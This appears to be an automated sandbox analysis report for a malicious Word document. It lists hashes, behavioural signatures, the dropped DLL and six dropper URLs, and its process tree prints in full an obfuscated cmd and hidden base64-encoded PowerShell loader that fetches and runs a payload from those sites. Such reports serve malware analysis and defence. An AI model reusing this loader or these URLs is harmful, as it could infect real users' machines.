Analysis

  • max time kernel
    86s
  • max time network
    85s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 19:45

General

  • Target

    V343822.doc

  • Size

    86KB

  • MD5

    e0983f7a4c35fd6056be9cdf40bf27e8

  • SHA1

    b97825db147014805b7aa55f1e8f670cdc5d9f33

  • SHA256

    79ce7baebe9784a507b210c9959e8c1d20f80dd499cfb8077501fbc4c1b9489f

  • SHA512

    126074dfeab725ad8df6627f8ba63511620301faa98475d1ac80ce7ff6086971df435ff97a4b50661aec86b927a3f0a511f77eecbb21a8f0fa3a806627f75748

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://globalruraldevelopmentagency.co.za/cgi-bin/inf/

exe.dropper

https://trioconcuerda.es/cgi-bin/Services/

exe.dropper

http://abbc.tv/wp-content/Triedit/

exe.dropper

http://asafina.co/wp-content/G3GLLO/

exe.dropper

http://bluepassgt.com/von-weise-ludzp/DNNXcQcRTT/

exe.dropper

http://larissarobles.com/wp-admin/SIGNUP/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\V343822.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1824
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1572
    • C:\Windows\system32\cmd.exe
      cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -w hidden -enc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1072
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll ShowDialogA
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1000
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll ShowDialogA
              4⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1880
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sopasslvkxohgf\pywfunapjuixp.fha",ShowDialogA
                5⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:752

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll
        MD5

        9ae559f1a34de3012d9f2931f344c0f2

        SHA1

        228f2d012a1f2edce63dcabed6d6b3e6f36744ca

        SHA256

        58e1e8ba89dd40c277d2bb323f710846de5f2bd752b63c6971d4e681b26fb63b

        SHA512

        a16b735abf567c9ea8e1e17cb37b7c71bdc3da633d94c8466cde025177092f71478e5db3bda02548c8c4d14352fb6a03e45ae97f9b4b6c8edb757d2077558d92

      • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
        MD5

        9ae559f1a34de3012d9f2931f344c0f2

        SHA1

        228f2d012a1f2edce63dcabed6d6b3e6f36744ca

        SHA256

        58e1e8ba89dd40c277d2bb323f710846de5f2bd752b63c6971d4e681b26fb63b

        SHA512

        a16b735abf567c9ea8e1e17cb37b7c71bdc3da633d94c8466cde025177092f71478e5db3bda02548c8c4d14352fb6a03e45ae97f9b4b6c8edb757d2077558d92

      • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
        MD5

        9ae559f1a34de3012d9f2931f344c0f2

        SHA1

        228f2d012a1f2edce63dcabed6d6b3e6f36744ca

        SHA256

        58e1e8ba89dd40c277d2bb323f710846de5f2bd752b63c6971d4e681b26fb63b

        SHA512

        a16b735abf567c9ea8e1e17cb37b7c71bdc3da633d94c8466cde025177092f71478e5db3bda02548c8c4d14352fb6a03e45ae97f9b4b6c8edb757d2077558d92

      • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
        MD5

        9ae559f1a34de3012d9f2931f344c0f2

        SHA1

        228f2d012a1f2edce63dcabed6d6b3e6f36744ca

        SHA256

        58e1e8ba89dd40c277d2bb323f710846de5f2bd752b63c6971d4e681b26fb63b

        SHA512

        a16b735abf567c9ea8e1e17cb37b7c71bdc3da633d94c8466cde025177092f71478e5db3bda02548c8c4d14352fb6a03e45ae97f9b4b6c8edb757d2077558d92

      • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
        MD5

        9ae559f1a34de3012d9f2931f344c0f2

        SHA1

        228f2d012a1f2edce63dcabed6d6b3e6f36744ca

        SHA256

        58e1e8ba89dd40c277d2bb323f710846de5f2bd752b63c6971d4e681b26fb63b

        SHA512

        a16b735abf567c9ea8e1e17cb37b7c71bdc3da633d94c8466cde025177092f71478e5db3bda02548c8c4d14352fb6a03e45ae97f9b4b6c8edb757d2077558d92

      • memory/676-2-0x0000000000000000-mapping.dmp
      • memory/752-18-0x0000000000000000-mapping.dmp
      • memory/876-20-0x000007FEF5D50000-0x000007FEF5FCA000-memory.dmp
        Filesize

        2.5MB

      • memory/1000-11-0x0000000000000000-mapping.dmp
      • memory/1072-6-0x000000001AD00000-0x000000001AD01000-memory.dmp
        Filesize

        4KB

      • memory/1072-10-0x000000001C420000-0x000000001C421000-memory.dmp
        Filesize

        4KB

      • memory/1072-9-0x000000001B7B0000-0x000000001B7B1000-memory.dmp
        Filesize

        4KB

      • memory/1072-8-0x0000000002530000-0x0000000002531000-memory.dmp
        Filesize

        4KB

      • memory/1072-7-0x00000000025D0000-0x00000000025D1000-memory.dmp
        Filesize

        4KB

      • memory/1072-5-0x0000000002010000-0x0000000002011000-memory.dmp
        Filesize

        4KB

      • memory/1072-4-0x000007FEF4D90000-0x000007FEF577C000-memory.dmp
        Filesize

        9.9MB

      • memory/1072-3-0x0000000000000000-mapping.dmp
      • memory/1572-19-0x0000000000000000-mapping.dmp
      • memory/1880-13-0x0000000000000000-mapping.dmp